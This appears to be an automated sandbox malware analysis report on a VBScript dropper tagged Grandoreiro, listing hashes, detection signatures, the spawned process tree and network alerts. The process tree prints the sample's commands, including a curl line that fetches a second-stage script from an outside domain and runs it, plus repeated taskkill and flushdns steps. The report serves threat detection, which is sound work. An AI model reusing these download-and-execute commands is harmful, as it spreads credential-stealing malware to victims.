Edit tour
Windows
Analysis Report
672365339196e.vbs
Overview
General Information
| Sample name: | 672365339196e.vbs |
| Analysis ID: | 1546041 |
| MD5: | 67c2e775c3447ed3cd210f615ad84ac5 |
| SHA1: | 117163fbe969960166af9d68f519cf975aa223c8 |
| SHA256: | f8520d764363ff22784c2bd6f77829ffe7396637936d68855bf56ae1f0c6dd5e |
| Tags: | geoGrandoreiroMEXPRTvbsuser-NDA0E |
| Infos: |   |
 | |
Detection
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Benign windows process drops PE files
Multi AV Scanner detection for dropped file
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Excessive usage of taskkill to terminate processes
Overwrites code with function prologues
Potential malicious VBS script found (has network functionality)
Queries sensitive battery information (via WMI, Win32_Battery, often done to detect virtual machines)
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Tries to access browser extension known for cryptocurrency wallets
Uses ipconfig to lookup or modify the Windows network settings
Uses known network protocols on non-standard ports
Uses ping.exe to check the status of other devices and networks
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Keylogger Generic
Classification
- System is w10x64
wscript.exe (PID: 3840 cmdline: C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\67236 5339196e.v bs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
cmd.exe (PID: 3976 cmdline: "C:\Window s\System32 \cmd.exe" /V/D/c cur l -k -o C: \Users\Pub lic\672365 3391970.vb s https:// endesa.cli ck/6723653 39188b/672 3653391970 .vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2248 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
curl.exe (PID: 876 cmdline: curl -k -o C:\Users\ Public\672 3653391970 .vbs https ://endesa. click/6723 65339188b/ 6723653391 970.vbs MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1) - cmd.exe (PID: 3048 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 7236533919 70.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4256 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 5860 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \672365339 1970.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) 
BLOCKBUSTER.exe (PID: 4828 cmdline: "C:\_67236 5339188b\B LOCKBUSTER .exe" MD5: 74D3F521A38B23CD25ED61E4F8D99F16) - cmd.exe (PID: 3800 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1336 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5176 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 4904 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 4884 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - PING.EXE (PID: 5836 cmdline:
ping 127.0 .0.1 MD5: B3624DD758CCECF93A1226CEF252CA12) - cmd.exe (PID: 5832 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 6748 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 3428 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 2248 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 1756 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - PING.EXE (PID: 5676 cmdline:
ping 127.0 .0.1 MD5: B3624DD758CCECF93A1226CEF252CA12) - Conhost.exe (PID: 1828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 6184 cmdline:
cmd.exe /c ipconfig /flushdns MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 3976 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - ipconfig.exe (PID: 5156 cmdline:
ipconfig / flushdns MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB) - cmd.exe (PID: 5476 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5912 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3052 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5248 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5952 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 2632 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 2788 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 4072 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 1548 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 3472 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 4328 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - PING.EXE (PID: 4592 cmdline:
ping 127.0 .0.1 MD5: B3624DD758CCECF93A1226CEF252CA12) - cmd.exe (PID: 5440 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 516 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5112 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2788 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5872 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 420 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4576 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 1436 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 3940 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 5176 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 2632 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 6568 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 5860 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 1540 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 2580 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 6184 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 2224 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 2672 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 5672 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 5856 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 5588 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 6008 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4548 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 3896 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 3412 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 1052 cmdline:
"C:\Window s\System32 \cmd.exe" /C C:\_672 365339188b \MPDK.bat MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - conhost.exe (PID: 4152 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - taskkill.exe (PID: 3380 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 3840 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - taskkill.exe (PID: 1128 cmdline:
taskkill / f /im BLOC KBUSTER.ex e MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD) - cmd.exe (PID: 948 cmdline:
"C:\Window s\System32 \cmd.exe" /V/D/c sta rt C:\User s\Public\6 7236533919 70.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5236 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - wscript.exe (PID: 6816 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\Public \672365339 1970.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security | ||
| JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_DelphiSystemParamCount | Detected Delphi use of System.ParamCount() | Joe Security |
System Summary |   |
|---|
| Source: | Author: frack113, Florian Roth: | ||
| Source: | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): | ||
| Source: | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: | ||
| Source: | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): | ||
| Source: | Author: frack113: | ||
| Source: | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: | ||
| Source: | Author: Michael Haag: | ||
| Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-31T12:18:18.015460+0100 | 2022930 | 1 | A Network Trojan was detected | 52.149.20.212 | 443 | 192.168.2.6 | 49778 | TCP |
| 2024-10-31T12:18:56.862370+0100 | 2022930 | 1 | A Network Trojan was detected | 4.245.163.56 | 443 | 192.168.2.6 | 49973 | TCP |
Click to jump to signature section
Show All Signature Results
AV Detection | |
|---|
| Source: | ReversingLabs: | ||
| Source: | Integrated Neural Analysis Model: | ||
| Source: | Binary or memory string: | memstr_b46a6645-7 | |
| Source: | HTTPS traffic detected: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Binary string: | ||
| Source: | Code function: | 14_2_6FCDC2D0 | |
Software Vulnerabilities | |
|---|
| Source: | Child: | ||
Networking | |
|---|
| Source: | Network Connect: | Jump to behavior | ||
| Source: | TCP traffic: | ||
| Source: | Dropped file: | Jump to dropped file | ||
| Source: | Dropped file: | Jump to dropped file | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Network traffic detected: | ||
| Source: | Process created: | ||
| Source: | TCP traffic: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||
| Source: | HTTP traffic detected: | ||